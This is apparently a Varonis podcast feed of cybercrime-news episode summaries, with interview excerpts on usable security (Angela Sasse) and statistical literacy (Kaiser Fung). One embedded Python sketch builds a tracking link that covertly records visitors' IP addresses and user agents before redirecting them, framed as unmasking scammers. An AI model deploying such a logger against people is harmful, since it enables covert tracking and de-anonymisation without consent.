Join us for State of Cybercrime, where experts discuss the latest trends and developments in the world of cybercrime and provide insights into how organizations can protect themselves from potential threats.
Sponsored by Varonis
DeepSeek, the Chinese AI startup dominating news feeds, has experienced exponential growth while wiping almost $1 trillion off the U.S. stock market. However, the model's rise has now been overshadowed by a surge of malicious attacks.
On this special episode of State of Cybercrime, Matt and David explore the rise of this innovative AI tool, the subsequent attacks, and the potential vulnerabilities of the AI model. DeepSeek won’t be the last shadow AI app you have to worry about.
So what steps can you take to ensure you can discover and stop shadow AI apps from inhaling your corporate secrets? Read our latest blog for more insights and immediate actions you can take to protect your organization from shadow AI.
📌 DeepSeek Discovery: How to Find and Stop Shadow AI: https://www.varonis.com/blog/deepseek
On this episode of State of Cybercrime, Matt and David cover the most recent Chinese state-sponsored APT attack by Silk Typhoon on the U.S. Treasury Department. They discuss how the attackers used a remote support tool to enable unauthorized access to Treasury workstations and unclassified documents. They also dive into some of the most pressing cybersecurity news and recent breaches you should know about.
In this episode, Matt and David delve into the evolving story of Salt Typhoon, a Chinese state-sponsored group, and their use of the innovative 'GhostSpider' backdoor to infiltrate telecommunication service providers. This sophisticated and far-reaching cyberattack, which is much larger than previously understood, has compromised sensitive cellular logs and data from government entities, telecom providers, and millions of Americans. Don’t miss this opportunity to stay informed and keep your organization safe!
Russia's APT29, a.k.a. "Midnight Blizzard," is arguably one of the world's most notorious threat actors. You might recall their involvement in the 2020 SolarWinds attack, when they operated under the alias "Cozy Bear."
The group is back with more relentless attacks—breaching cloud credentials and targeting over 100 organizations worldwide.
In this episode of State of Cybercrime, Matt and David dive into some of the hottest cybersecurity news and recent breaches, including Midnight Blizzard. Discover how these sophisticated attacks are happening and what you can do to stay a step ahead.
Hosts Matt Radolec and David Gibson explain how cybercriminals are manipulating AI models like ChatGPT to plant false memories and steal data, along with other cybercrime-related stories like Salt Typhoon.
Salt Typhoon is a Chinese hacking group that has reportedly breached multiple key U.S. broadband providers. The hackers may have had access to these networks for months, raising significant concerns about the security of sensitive communications data.
More from Varonis ⬇️
Visit our website: https://www.varonis.com
LinkedIn: https://www.linkedin.com/company/varonis
X/Twitter: https://twitter.com/varonis
Instagram: https://www.instagram.com/varonislife/
#Cybercrime #DataSecurity
The North Korean Lazarus group is running multiple high-risk campaigns: one exploiting Windows and another installing malware through fraudulent blockchain job offers.
State of Cybercrime hosts Matt Radolec and David Gibson discuss various APT groups, including a prolific ransomware-as-a-service operation and the Chinese cyber espionage gang known as Volt Typhoon, along with other notable vulnerabilities in this episode, including:
+ Lazarus FudModule rootkit attacks and the concurrent Eager Crypto Beavers campaign
+ RansomHub attacks on Halliburton, Change Healthcare, and hundreds more
+ Large-scale extortion of AWS environments through exposed ENV files
+ Hundreds of exposed servers from Volt Typhoon’s ISP targeting
+ Payment gateway breach exposing the data of over 1.7 million credit card owners
Matt Radolec and David Gibson discuss how an unknown attacker recently exploited a vulnerability in Proofpoint’s email routing system, allowing them to bypass security measures and send millions of spoofed emails on behalf of major companies.
The co-hosts also cover:
+ The North Korean threat actor hired using AI
+ The biggest ransomware payment ever made
+ How X is training its Grok AI LLM with your posts
+ The EU’s groundbreaking AI act
+ How anyone can access deleted and private repositories on GitHub
+ Updates on AMD's silicon-level "SinkClose" processor flaw
In this episode of State of Cybercrime, co-hosts Matthew Radolec and David Gibson dive into the details around LockBit, and cover other news including:
+ The MOVEit authentication bypass flaw
+ Developments in the Polyfill supply chain attack affecting millions of websites
+ Updates on the targeted campaign against Snowflake
+ A massive insider breach of a Pennsylvania healthcare system
+ Two new attack methods threat actors are adopting
+ The new OpenSSH unauthenticated RCE vuln that gives root privileges on Linux systems
Snowflake, a cloud storage platform used by some of the largest companies in the world, is investigating a targeted attack on its users who lack multifactor authentication.
Join Matt Radolec and David Gibson for an episode of State of Cybercrime in which we discuss the increased attacks on Snowflake customers and share our five-point checklist for ensuring your cloud databases are properly configured and monitored.
WE’LL ALSO COVER:
...and more!
More from Varonis ⬇️
Visit our website: https://www.varonis.com
LinkedIn: https://www.linkedin.com/company/varonis
X/Twitter: https://twitter.com/varonis
Instagram: https://www.instagram.com/varonislife/
A new data leak of more than 500 documents published to GitHub reveals the big business behind China’s state-sponsored hacking groups — from top-secret surveillance tools to details of offensive cyber ops carried out on behalf of the Chinese government.
Join Matt and David for a special State of Cybercrime, which dives into China's espionage campaigns and complex network of resources.
We’ll also discuss:
- The massive cyberattack on Change Healthcare
- Zyndicate’s successful hack of the Danish government
- Apple Vision Pro’s launch day woes
- Multiple developments in AI risk/regulation
- How LockBit remains active after their servers and domains were seized
- And more!
CISA issued an emergency directive to mitigate Ivanti Connect Secure and Ivanti Policy Secure vulnerabilities after learning of malware targeting the software company, allowing unauthenticated threat actors to access Ivanti VPNs and steal sensitive data.
CISA is requiring all federal agencies to disconnect from affected Ivanti products by EOD February 2, 2024. The directive also warned that attackers had bypassed workarounds for current resolutions and detection methods.
Join Matt, David, and Dvir to learn more about the Ivanti vuln and other cyber threats.
OTHER BREAKING STORIES WE'LL COVER:
• The latest ChatGPT news
• Deepfakes… err breachfakes
• Cloudflare's breach by suspected nation-state attacker
• "Frog4Shell" spreading malware inside your network
And more!
More from Varonis ⬇️
Visit our website: https://www.varonis.com
LinkedIn: https://www.linkedin.com/company/varonis
X/Twitter: https://twitter.com/varonis
Instagram: https://www.instagram.com/varonislife/
Enjoy our first State of Cybercrime episode of 2024 as Matt Radolec and David Gibson cover:
Mentioned in this episode:
In this episode of State of Cybercrime, the hosts discuss a range of topics, including President Biden's executive order on artificial intelligence (AI), which seeks to balance AI safety, security, privacy, and innovation with American leadership in AI. They also cover the disruption of the Mozi botnet, the SEC's fraud charges against SolarWinds' CISO, and the difficulties IT administrators face in patching vulnerabilities. They touch on the continued exploitation of Citrix and Confluence and the emergence of the cybercrime ring Hunters International, and they explore AI's potential and the need for legislation to prevent its nefarious uses.
00:30 Introduction and Welcome
01:04 Agenda for the Episode
02:03 Good News: Dismantling of Pirates
05:46 Good News: Disruption of Mozi Botnet
07:16 Danger Zone: SEC Charges SolarWinds CISO
12:25 Vulnerable Vulnerabilities: Citrix Vulnerabilities
15:34 Vulnerable Vulnerabilities: Confluence Vulnerability
17:02 AI Vey: President Biden's Executive Order on AI
18:51 AI Vey: UK Summit on AI
22:55 Conclusion
Few breaches have drawn as much social media fervor as the recent 23andMe incident, in which the genomics company was victim to a massive credential stuffing attack that leveraged leaked and reused passwords to target accounts without MFA.
What differentiates this attack from others is that 23andMe itself was not breached, but an entire wave of its users was targeted individually. There are claims that these profiles — including genetic and geographic ancestry data — are available on hacking forums, but the legitimacy of those claims is still being investigated.
Join the State of Cybercrime team, Matt, David, and Dvir, to learn about the numerous tools hackers use for cred stuffing, examples of when these tactics have been used in organizational attacks, and what you can do to protect yourself.
Join Matt Radolec and David Gibson for this episode of the State of Cybercrime, recording from Black Hat 2023, as they cover the latest threats you need to know about. Also be sure to check out our webinar, New SEC Cyber Rules: Action Plan for CISOs and CFOs on Tuesday, August 22 | 12 p.m. ET. Link here: https://info.varonis.com/en/webinar/what-the-new-sec-requirements-mean-for-your-org-2023-08-22
The Storm-0558 incident has proven to be even more widespread than initially reported. While Microsoft originally stated that only Outlook.com and Exchange Online were affected, Wiz Research has discovered that the compromised signing key may have allowed the cybercriminal group to forge access tokens for SharePoint, Teams, OneDrive, and every other app that supports logging in with Microsoft credentials. Watch this State of Cybercrime episode as our team of experts assesses the reach of the incident and explains what you should do to make sure you are safe and secure.
A Microsoft zero-day vulnerability has allowed hacking group Storm-0558 to forge Azure AD authentication tokens, and breach organizations — including U.S. government agencies — in the past week. Watch this State of Cybercrime episode to hear our experts break down how this attack happened, see the discoveries made by the Varonis Threat Labs team, and learn what you can do to make sure your data is safe and secure.
Across the globe, the CL0P ransomware group is extorting hundreds of organizations after exploiting a previously unknown SQL injection vulnerability in the MOVEit file transfer service. Victims need to contact the ransomware group by June 14 or their stolen data will be published publicly on the group's extortion site. Join Matt Radolec, David Gibson, and special guest Dvir Sason to learn more about how the ransomware group exploited the critical flaw in the transfer application, which they had likely been experimenting with since 2021.
In the wake of the U.S. defense leak, the Pentagon CIO has given a one-week deadline for all defense agencies to ensure compliance with DOD information security protocols. But what does that actually mean? Join Matt, David, and Varonis Team Lead Engineer for U.S. Public Sector Trevor Brenn for a State of Cybercrime episode that breaks down what the DOD is demanding from its agencies and how this influences the future of information security within government.
Links mentioned in this episode:
• Video course (free) on building an IR plan: https://info.varonis.com/thank-you/course/cyber-incident-response
• Blog post about LockBit: https://www.varonis.com/blog/anatomy-of-a-ransomware-attack
• Blog post about HardBit: https://www.varonis.com/blog/hardbit-2.0-ransomware
Recent cyberattacks, zero-days, and APTs have positioned China as a cybersecurity adversary. Join Matt Radolec and David Gibson for a special State of Cybercrime episode, during which the two discuss the recent wave of stealthy Chinese cyberattacks against U.S. private networks and what this means for U.S.-Chinese relations in 2023.
Matt and David also cover:
- The congressional TikTok hearing and the data privacy concerns raised by Chinese ownership
- The recent wave of Facebook accounts hacked via a malicious ChatGPT Chrome extension
- Our "good news" segment: the shutdown of the notorious Breached hacking forum
- The 55 zero-days that were weaponized in 2022
Still reeling from last year’s data breach, password manager LastPass recently shared that the same attacker who targeted the organization in August has struck again, this time using stolen data to hack an employee’s home computer.
Join Matt Radolec and David Gibson as they walk you through the multi-stage attack, revisiting the discussion of the initial intrusion and outlining how that stolen data was weaponized months later to breach the company’s vault.
Matt and David will also spotlight recent vulnerabilities that you should keep an eye on and discuss the meteoric rise of wiperware.
We cover:
Links mentioned in the show:
LockBit ransomware, what you need to know
VMware ESXi in the Line of Ransomware Fire
Visit our website and sign up for emails to be notified of new live episodes.
Watch the podcast on our YouTube channel.
We're back! Kind of. We'll soon relaunch this podcast and wanted to give you a quick update on what's happening.
Thanks for watching the first season of the security tools podcast! Want more? We're live on the SecurityFwd YouTube channel twice per week!
Come hack with us or watch any of the previously recorded streams.
Nick's Twitter: https://twitter.com/nickgodshall
Kody's Twitter: https://twitter.com/kodykinzie
Varonis Cyber Attack Workshop: https://www.varonis.com/cyber-workshop/
Canary Tokens - https://canarytokens.org/generate
Learn more about canaries - https://canary.tools/
Adrian's Twitter - https://twitter.com/sawaba
Apologies for the scratchy mic!
Vic's Blog on Defeating Facial Recognition: https://vicharkness.co.uk/2019/02/01/the-art-of-defeating-facial-detection-systems-part-two-the-art-communitys-efforts/
Check out Vic's Twitter: https://twitter.com/VicHarkness
Kody's Twitter: https://twitter.com/kodykinzie
Varonis Cyber Attack Workshop: https://www.varonis.com/cyber-workshop/
Joshua's Twitter: https://twitter.com/jbrowder1
DoNotPay's website: https://donotpay.com
Sue Phone Scammers: https://donotpay.com/learn/robocall-compensation
This podcast is brought to you by Varonis. If you'd like to learn more, check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Mathy's Website: https://www.mathyvanhoef.com
Mathy's Twitter: https://twitter.com/vanhoefm
Mathy's Paper on Defeating MAC Address Randomization: https://papers.mathyvanhoef.com/asiaccs2016.pdf
This podcast is brought to you by Varonis. If you'd like to learn more, check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Seytonic's Malduino Website: https://maltronics.com/
Seytonic's Website: https://seytonic.com/
Seytonic's YouTube Channel: https://www.youtube.com/channel/UCW6xlqxSY3gGur4PkGPEUeA
This podcast is brought to you by Varonis. If you'd like to learn more, check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Alex's Website: http://alexlynd.com
Check out the Creep Detector Video: https://www.youtube.com/watch?v=ug9dHwm3h0s
Alex Lynd's Twitter: https://twitter.com/alexlynd
Check out Alex's GitHub: https://github.com/AlexLynd
This podcast is brought to you by Varonis. If you'd like to learn more, check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Check out Maltego: https://www.maltego.com/
Maltego Twitter: https://twitter.com/maltegohq
Check out Maltego use cases: https://docs.maltego.com/support/solutions/articles/15000012022-use-cases
This podcast is brought to you by Varonis. If you'd like to learn more, check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Check out Objective-See: https://objective-see.com/
Objective-See Twitter: https://twitter.com/objective_see
Objective-See Patreon: https://www.patreon.com/objective_see
While In Russia: Patrick's RSA talk on hacking journalists -
Patrick's Twitter: https://twitter.com/patrickwardle
This podcast is brought to you by Varonis. If you'd like to learn more, check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Stefan's Site with links to all of his projects: https://spacehuhn.io/
Twitter: https://twitter.com/spacehuhn
YouTube: https://www.youtube.com/channel/UCFmjA6dnjv-phqrFACyI8tw
An overview of the ESP8266: https://www.espressif.com/en/products/hardware/esp8266ex/overview
Stefan's GitHub: https://github.com/spacehuhn
ESP8266 Deauther 2.0: https://github.com/spacehuhn/esp8266_deauther
WiFi Duck - wireless injection attack platform: https://github.com/spacehuhn/WiFiDuck
WiFi Satellite - monitoring and logging 2.4 GHz WiFi traffic
This podcast is brought to you by Varonis. If you'd like to learn more, check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
A honeypot is a tool that acts as bait, luring an attacker into revealing themselves by presenting a seemingly juicy target. In our first Security Tools podcast, we explore a free tool called Grabify that can gather information about scammers or attackers when they click on a honeypot tracking link.
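To illustrate the principle (this is not Grabify's implementation, just a minimal sketch of how a tracking link can capture visitor metadata), a tiny Python handler might log the click and then redirect to a harmless page:

```python
# Minimal sketch of a honeypot tracking link: log who clicked, then redirect.
# Illustration only -- not how Grabify itself works.
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timezone

DECOY_URL = "https://example.com/cute-cat-video"  # where the visitor ends up

class TrackingLinkHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record the metadata a single click reveals.
        print(f"{datetime.now(timezone.utc).isoformat()} "
              f"ip={self.client_address[0]} "
              f"user_agent={self.headers.get('User-Agent', 'unknown')} "
              f"path={self.path}")
        # Send the visitor on to the decoy so nothing looks unusual.
        self.send_response(302)
        self.send_header("Location", DECOY_URL)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), TrackingLinkHandler).serve_forever()
```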
https://twitter.com/grabifydotlink
This podcast is brought to you by Varonis. If you'd like to learn more, check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
We wanted you to be the first to know that next week, we will be back in this same feed with a new security podcast from Varonis.
The new Security Tools podcast will keep you up to date with the most exciting and useful tools the Infosec community has to offer.
Join us on the new show to hear from the researchers and hackers behind tools like Grabify, a link-based Honeypot service that unmasks scammers leveraging the same web tracking tactics used by most modern websites. We’ll find out why it’s so hard to stay anonymous online and show you how to use the power of tracking links to find the real location of an online scammer.
See you next week.
Summer is approaching, and of course, that's when we feel the most heat. Cybersecurity managers, however, feel the heat all the time: they must be right every time, while cybercriminals only have to be right once. For cybersecurity pros, summer can feel like it lasts year-round, and that can lead to job burnout.
Another problem managers face is the potential ineffectiveness of cybersecurity awareness training. Learning and sharing interesting security information in a class is wonderful and mind-expanding for users. But if it doesn't change their behavior and they keep clicking on links they shouldn't be clicking on, training might not be as helpful as it claims to be.
Other articles discussed:
Panelists: Cindy Ng, Mike Buckbee, Kris Keyser, Kilian Englert
Searching a traveler’s phone or laptop is not an extension of a search made on a piece of luggage. As former commissioner of Ontario Ann Cavoukian said, “Your smartphone and other digital devices contain the most intimate details of your life: financial and health records.”
In general, it’s also dangerous to connect laws made in accordance with the physical world to the digital space. But even with GDPR that’s aimed to protect consumer data, the law hasn’t taken action against any major technology firms such as Google or Facebook.
It seems our relationship with technology might get worse before it gets better.
Other articles discussed:
Lately, we’ve been hearing more from security experts who are urging IT pros to stop scapegoating users as the primary reason for not achieving security nirvana. After covering this controversy on a recent episode of the Inside Out Security Show, I thought it was worth having an in-depth conversation with an expert.
So, I contacted Angela Sasse, Professor of Human-Centred Technology in the Department of Computer Science at University College London, UK. Over the past 15 years, she has been researching the human-centered aspects of security, privacy, identity, and trust. In 2015, for her innovative work, she was awarded the Fellowship of the Royal Academy of Engineering (FREng), recognizing her as one of the best and brightest engineers and technologists in the UK.
In part one of my interview with Professor Angela Sasse, we cover the challenges that CISOs have in managing risk while finding a way to understand what’s being asked of the user. And more importantly, why improving the usability of security can positively impact an organization’s profits.
For her exceptional work, Professor Angela Sasse was awarded the Fellowship of the Royal Academy of Engineering in 2015, recognizing her as one of the best and brightest engineers and technologists in the UK.
Cindy Ng: I think what you're doing is multilayered, multifaceted, and you're targeting two very different fields: you're thinking about how to design innovative technologies that are functional while driving the bottom line, so that's B2B, and then also improving the well-being of individuals and society, and that's B2C, and the strategies for those two things are very different. So maybe to peel back the layers and start from the beginning: your research focuses on the human usability of security, and perhaps privacy too. It might be helpful to define what usability encompasses.
Angela Sasse: Okay. So, usability, there's a traditional definition, there's an, you know, International Standards Organization definition of it, and it says, "Usability is if a specified user group can use the mechanism to achieve their goals in a specified context of use." And that actually makes it really quite, quite complex, because what it's really saying is there isn't a sort of, like, hard-line measure of what's usable and what isn't. It's about the fit, how well it fits the person that's using it and the purpose they're using it for in the situation that they're using it.
Cindy Ng: Usability is more about the user, the human and not necessarily the technology, it's, after all, just a tool. And we have to figure out a way to fit usability into the technology we're using.
Angela Sasse: Yes, of course, and what it amounts to is that, of course, it's not economic. It wouldn't be economically possible to get a perfect fit for 120 different types of interactions in situations that you do. What we generally do is use four or five different forms of interaction, you know, that work well enough across the whole range of interactions that we do. So there's locally optimal and globally optimal: you could make a super good fit for each different situation, but you don't want to know about 120 different ways of doing something, so globally optimal is to have a limited set of interactions and symbols and things that you're dealing with when you're working with technology.
So, security, however, one of the things that a lot of people overlook when it comes to security and usability is that from the user's point of view, security is always what usability people call a secondary task or enabling task. So this is a task I have to do to get to the thing I really want to do, and so the kind of tolerance or acceptance that people have for delays or difficulty is even less than with their sort of primary interactions.
Cindy Ng: It's like a chore. For instance, an example would be I need to download an app, perhaps, in order to register for something.
Angela Sasse: Yeah, and so what you want to do is, you know, you want to use the app for a particular purpose, and then if you basically have...if the user perceives that in order to be able to use the app, you know, all the stuff you have to do to get to that point is too much of a hurdle, then most of them would just turn around and say, "It's not worth it. I'm not going ahead."
Cindy Ng: When it comes to the security aspect, how does a CISO or an IT security admin decide that users are dangerous, and that if they only had the same knowledge that I have, they would behave differently? Where does downloading the app or using a website intersect with what a CISO does?
Angela Sasse: A CISO is trying to manage the risks, and some of the risks might affect the individual employee or individual customer as well. But other risks are really risks to the organization, and if something went wrong it wouldn't directly affect the employee or the customer. But I think what I would say to a CISO or SysAdmin is, "You've got to understand what you are asking the user to do. You have to accept that you're a security specialist, and you are focused on delivering security, but you're the only person in the organization for whom security is a primary task.
For everybody else, it's a secondary task. It's a hurdle they have to jump over in order to do what they've been trained for, what they are good at, what they're paid to do. And so it's in your best interest to make that hurdle as small as possible. You should effectively manage the risk, but you've got to find ways of doing it that don't really bother anyone, ways that take as little time and effort as possible away from the people who have to do it. Because otherwise you end up eating all the profits. Right?"
Angela Sasse: The more effort you're basically taking away from the main activity that people do, the more you're reducing the profits of the organization.
Cindy Ng: You've done the research, you're presenting it, and you're interacting with CISOs and SysAdmins. How has the mindset evolved, and what has some of the pushback been? Can you provide some examples?
Angela Sasse: Early on, a lot of the pushback was really, well, people should do what they are told, and the other main pushback is, "So, you're telling me this is difficult or effortful for people to do. Can we give them some training?" The real pushback is that they don't want to think about changing, making changes to the technology and to the way they are managing the risks. So their first thought is always, "How can I make people do what I want them to do?" And so the very first big study that Adams and I did, we then subsequently...it's published in the paper, "Users Are Not the Enemy."
So, this was a very big telecommunication company, and we said to them, "Look, your staff have between 16 and 64 different passwords, six-digit PINs and eight-character complex passwords, and you're telling them each one has to be different and they can't write them down." And they were also expiring them every 30 days, so staff had to change them every 30 days.
And basically I said, "Nobody can do this." Then they said, "Okay, could they do it if we gave them some extra training?" And my response was, "Yes, and that would look like this, all your employees have to go on a one-year course to become memory athletes. Even when they come back, they're going to spend half an hour a day doing the memory techniques that you need to do in order to be able to recall all this stuff."
And if you think about it that way, it's just absurd, rather than making changes to the password policy or providing an easier-to-use authentication mechanism. Sometimes what's equally ridiculous is, so, like, "Can you give me a psychology test so I can screen out the people who are not compliant, so that I can recruit people who are naturally compliant?"
That's bizarre. You need to recruit people who are good at the jobs that your business relies on, good at the stuff your business delivers. If you just recruit compliant and risk-averse people, you're gonna go bust. So sometimes you have to really show the absurdity of the natural thinking that there is. There is this initial resistance to go, like, "I don't really want to change the way I think about security, and I don't want to change the mechanisms I use."
Cindy Ng: I think a lot of the CISOs and SysAdmins are restricted too by the tools and the software, and they feel like they're confined and have to work within a framework, because their job is really technical. It's always about "are you able to secure my network" first, over the human aspect of it. And I really like what you said about how phishing scam attackers understand more of the human element of security than security designers do. Can you elaborate more on that?
Angela Sasse: I think... So, I'm working with some of the government here in the UK, with those government agencies that are responsible for security and for advising companies about security. And I think it's very interesting to see that they have concluded that CISOs need, and security practitioners, that they need to develop their soft skills and that they need to engage. They need to listen more, and they need to also learn how to...once they have listened, you know, and understand how they can provide a fit, then how they can persuade people of the need for change.
You know, because part of the whole problem is, if you reconfigure the mechanisms and they're now easier to use, people still need to change their behavior. They still need to move on from existing habits to the new ones, and that can be a bit of a blocker for change, and you need to persuade people to embark on this journey of changing their existing habits. And for that you need soft skills, and you need to persuade them that "I have now made it as easy as possible to use. Now your part, your responsibility, is to change your existing habit towards this new secure one, which is feasible to do. It's not particularly onerous, but you need to work through that process of changing, of learning a new habit."
Cindy Ng: How long do they want it to be? How long does it actually take, and how has their mindset evolved?
Angela Sasse: Most of them now realize that their role is really to be a cheerleader for security, not, you know, the kind of old-school gatekeeper who can stop everybody. So most of them now do realize.
Cindy Ng: When did that happen?
Angela Sasse: I think it's happened...it's only very recent. For the majority of them it happened in the last, maybe, four or five years. Some still haven't gotten there, but quite a few of them have, and, you know, I've seen some very...I mean, if I go to Infosec, for instance, I meet people there who've really done a very good job.
And I think, actually, say if you, for instance, look at the born digital companies. I think they generally do...they do very well. You know, if you look at Google, Amazon, Facebook, eBay, they've generally worked very hard to secure their business without...and they know that it would be a threat to their business if people couldn't use the security or found the security to be cumbersome. And I think they've actually done a good job, pretty good job, to look at how you can make it easier to use. So I think those companies are currently leading the charge.
But I've seen this happen in a couple of other... So, I think basically, for other companies that have very big customer bases, you know, the experience they get with that makes them realize that they have to make it easier for the customers to access services or use devices. Those lessons then also tend to filter through to how they are designing security for their own employees.
So, you know, if you look at mobile phone companies and the television companies, you know, cable and satellite TV companies, I think they've really internalized...so the people working there really have quite a modern outlook. I think next coming around the corner is the big software and technology development companies. They have started to...so companies like Microsoft have started to realize this as well.
Over the past few weeks, Kaiser Fung has given us some valuable pointers on understanding the big data stats we are assaulted with on a daily basis. To sum up, learn the context behind the stats — sources and biases — and know that the algorithms that crunch numbers may not have the answer to your problems.
In this third segment of our podcast, Kaiser points out all the ways stats can trick us through their inherently random nature — variability in stats-speak.
Your third point is to have a nose for doctored statistics. And for me, it's kind of like…what if you don't know what you don't know? Kind of like I was surprised to read in the school rankings chapter in Numbersense that different publications have different rules for ranking. And then I didn't know that reporting low GPAs as not available is a magic trick that causes a median GPA to rise. And so if I didn't know this, I would just use any number in any of these publications and use it in my marketing. How do I cultivate a nose for doctored statistics?
Kaiser Fung: Well, I think...well, for a lot of people, I think it would involve reading certain authors, certain people who specialize in this sort of stuff. I'm one of them, but there are also others out there who have this sort of skepticism, and they will point out how...you know, I mean, I think it's all about figuring out how other people do it, and then you can do it too, just following the same types of logic. Oftentimes there are multiple stages to this. So there's the stage of: can you smell something fishy? It's sort of this awareness of, "Okay, do I want to believe this or not?"
And then there's the next stage: once you smell something, do you know where to look, how to look, how to investigate it? Usually when you smell something, that means you have developed an alternative hypothesis or interpretation that is different from the thing you're reading. So in the scientific method, what we want to do at that point is try to go out and find corroborating evidence. So then the question becomes: do you have a notion of what kinds of things you could find that would help you decide whether you're right or whether the original person is right? And here the distinction is really that if you're more experienced, you might know that if I am able to find this information, that will be sufficient for me to validate this or to fortify that. So you don't necessarily go through the entire analysis. Maybe you just find a shortcut to get to a certain point.
And then the last stage, which is the hardest to achieve and also not always necessary, is: okay, if you no longer believe in what was published, how do you develop your alternative argument? That requires a little more work, and that's the kind of thing I try to train my students to do. Oftentimes when I set very open-ended problems for them, you can see people at different stages. There are people who don't recognize where the problems are, you know, who just believe what they see. There are people who recognize the problems and are able to diagnose what's wrong. Then there are ones who can diagnose what's wrong and, usually by looking at some other data or some other data points, can decide: okay, instead of making the assumptions that the original people made, which I no longer believe, I'm going to make a different set of assumptions. And if I make this other set of assumptions, what would be the logical outcome of the analysis? So I think it's something that can be trained. It's just difficult in the classroom setting, in our traditional textbook, lecture style. That type of stuff is very difficult to train.
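As a concrete aside on the median-GPA trick mentioned in the question above, here is a tiny sketch with made-up numbers showing how reporting the lowest GPAs as "not available" pushes the published median up:

```python
# Hypothetical illustration of the median-GPA trick: dropping the lowest
# values before reporting makes the published median look higher.
from statistics import median

gpas = [2.1, 2.4, 2.8, 3.0, 3.2, 3.4, 3.6, 3.8]    # full (made-up) class
reported = [g for g in gpas if g >= 2.5]            # low GPAs marked "N/A"

print(f"True median:     {median(gpas):.2f}")       # 3.10
print(f"Reported median: {median(reported):.2f}")   # 3.30
```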
Andy Green: Something you said about sort of being able to train ourselves. One thing that comes up in your books a lot is that many of us don't have a sense of the variability in the data. We don't understand what that means, or what it would look like if we were to put it on a bar chart; we don't have that picture in our mind. And one example that you talk about, I think in a blog post, is something we do a lot as marketers: A/B testing. So we'll do a comparison, changing one website slightly and then testing it, and notice that maybe it does better, we think. And then when we roll it out, we find out it really doesn't make too much of a difference. You talked about reasons why something might not scale up in an A/B test. I think you wrote about that for one of the blogs, I think it was Harvard Business Review.
Kaiser Fung: ...I'm not sure whether we're saying the same things. I'm not quite exactly remembering what I wrote about there. But from an A/B testing perspective, I think there are lots of little things that people need to pay attention to, because ultimately what you're trying to do is come up with a result that is generalizable, right? You can run your test in a period of time, but in reality you would like this effect, I mean whatever effect you find, to hold over the next period of time.
Now, I think both in this case and in what I just talked about before, one of the core concepts in statistics is understanding variability. Whatever number is put in front of you is just an at-the-moment sort of measurement, right? It's like if you measure your weight on the same scale, it's going to fluctuate, morning, night, you know, different days. But you don't have this notion that your weight has changed. The actual measurement of the weight, even though it's still the same weight, will be slightly different.
So that's the variability, but the next phase is understanding that there are sources of variability. There are many different reasons why things are variable. And I think that's what we're getting into. So in the case of A/B testing, there are many different reasons why your results may not generalize. One very obvious example is what we call a drift in population. Meaning that, especially with websites, a site changes over time. So even if you keep it stable during the test, when you roll it forward it may have changed. And just a small change in one part of the website could actually cause a very large change in the type of people who come to the page.
So I have done...in the past, I've done a lot of A/B testing around what you'd call the conversion funnel in marketing. And this is particularly an issue if you...let's say you're testing on a page that is close to the end of the funnel. Now, people do that because that's the most impactful place, because the conversion rates are much higher on those pages. But the problem is that because it's at the end of many steps, anything that changed in any of the prior steps is going to potentially change the types of people who end up on your conversion page.
So that's one reason: if there is variability in the type of people coming to your page, then even if the result worked during the test, it's not going to work later. But there are plenty of other things, including something that people oftentimes fail to recognize, which is that the whole basis of A/B testing is that you are randomly placing people into different pockets. And the randomization is supposed to, on average, tell you that the groups are comparable and the same. And while randomization will get you there almost all of the time, you can throw a coin 10 times and get 10 heads. There's a possibility that there is something odd about that particular case.
So another problem is: what if your particular test had this weird phenomenon? Now, in statistics, we account for that by putting error bars around these things. But it still doesn't solve the problem that that particular sample was a very odd sample. And so one of the underlying assumptions of all the analysis in statistics is that you're not analyzing that rare sample. That rare sample is kind of treated as outside of the normal situation. So yeah, there is a lot of subtlety in how you would actually interpret these things. A/B testing is still one of the best ways of measuring something, but even there, there are lots of things that it can't tell you.
I mean, I also wrote about the fact that sometimes it doesn't tell you...we'd like to say A/B testing gives you cause-effect analysis. It all depends on what you mean by cause-effect because even the most...for a typical example, like the red button and the green button, it's not caused by the color. It's like the color change did not cause anything. So there are some more intricate mechanisms there that if you really want to talk about cause, you wouldn't say color is a cause. Although in a particular way of interpreting this, you can say that the color is the cause.
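For the coin-flip point Kaiser makes above: even genuine randomization occasionally produces a lopsided sample. A quick sketch of the arithmetic, with purely illustrative numbers:

```python
# How often does pure chance hand you a completely lopsided split?
# Ten fair coin flips all landing heads has probability (1/2) ** 10.
p_all_heads = 0.5 ** 10
print(f"P(10 heads in 10 flips) = {p_all_heads:.5f}")  # ~0.00098, about 1 in 1024

# The same idea at A/B-test scale: run enough tests and a few will get
# noticeably unbalanced groups purely by chance, which is why error bars
# around a single odd sample never fully remove that risk.
```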
Andy Green: Right, right.
Cindy Ng: It really just sounds like at every point you have to ask yourself, is this accurate? Is this the truth? It's a lot more work to get to the truth of the matter.
Kaiser Fung: Yes. So I think when people sell you the notion that somehow, because of the volume of the data, everything becomes easy, I think it's the opposite. I think that's one of the key points of the book. When you have more data, it actually requires a lot more work. And going back to the earlier point, when you have more data, the amount of potentially wrong analysis, or of coming to the wrong conclusion, is exponentially larger. And a lot of that is because most analysis, especially with data that is not experimental, not randomized, not controlled, essentially relies on a lot of assumptions. And when you rely a lot on assumptions, it's the proverbial thing about being able to say whatever the hell you want with the data.
And so that's why I think it's really important, especially for those people who are not actually in the business of generating analysis: if you're in the business of consuming analysis, you really have to look out for yourself, because in this day and age people really could say whatever they want with the data they have.
Cindy Ng: So be a skeptic, be paranoid.
Kaiser Fung: Well, the nice thing is, when they're only talking about the colors of your bicycles and so on, you can probably just ignore it and not do the work, because it's not really that important to the problem. But on the other hand, in the other case that is ongoing, the whole Tesla autopilot algorithm thing, right? In those cases, and also when people are now getting into healthcare and all these other things where there's potentially a life-and-death decision, then you really should pay more attention.
Cindy Ng: This is great. Do you have any kind of final thoughts in terms of Numbersense?
